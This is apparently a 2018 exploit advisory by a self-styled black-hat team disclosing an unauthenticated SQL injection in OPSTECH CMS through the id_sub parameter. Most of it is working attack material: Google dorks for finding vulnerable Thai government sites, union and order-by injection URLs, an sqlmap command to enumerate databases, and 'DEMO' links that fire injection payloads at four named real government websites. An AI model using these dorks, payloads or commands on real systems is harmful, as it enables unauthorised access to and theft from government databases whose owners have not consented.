==========================================================
[+] Title :- OPSTECH (Open Source Technology) CMS - SQL INJECTION
[+] Date :- 6 - Nov - 2018
[+] Vendor Homepage :- http://www.opstech.co.th/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- inurl:id_sub= & site:go.th
intext:Copyright © 2008 by OPSTECH All Right Reserved. site:go.th
[+] Exploit Author :- mr.Gh0st N@0b
[+] Team name :- Myanmar Noob Hackers
[+] Greedz to :- All Myanmar Black Hats
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id_sub=
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error
[+] SQL vulnerable File :- /home/***/domains/XXX.go.th/public_html/core_main/index.php
[+] POC :- http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=[SQL]'
The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.
http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221' order by [SQL IN4JECTION]--+
http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221' union all select [SQL INJECTION]--+
[+] Sqlmap
sqlmap -u "http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221&id_type=1" -p id_sub --dbs --level=3
[+] DEMO :- http://www.janvan.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1
http://www.watsuwan.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1
http://www.nongpluang.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1
http://kohkwang.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1
=======================================================
# mr.Gh0st N@0b [2018-11-6]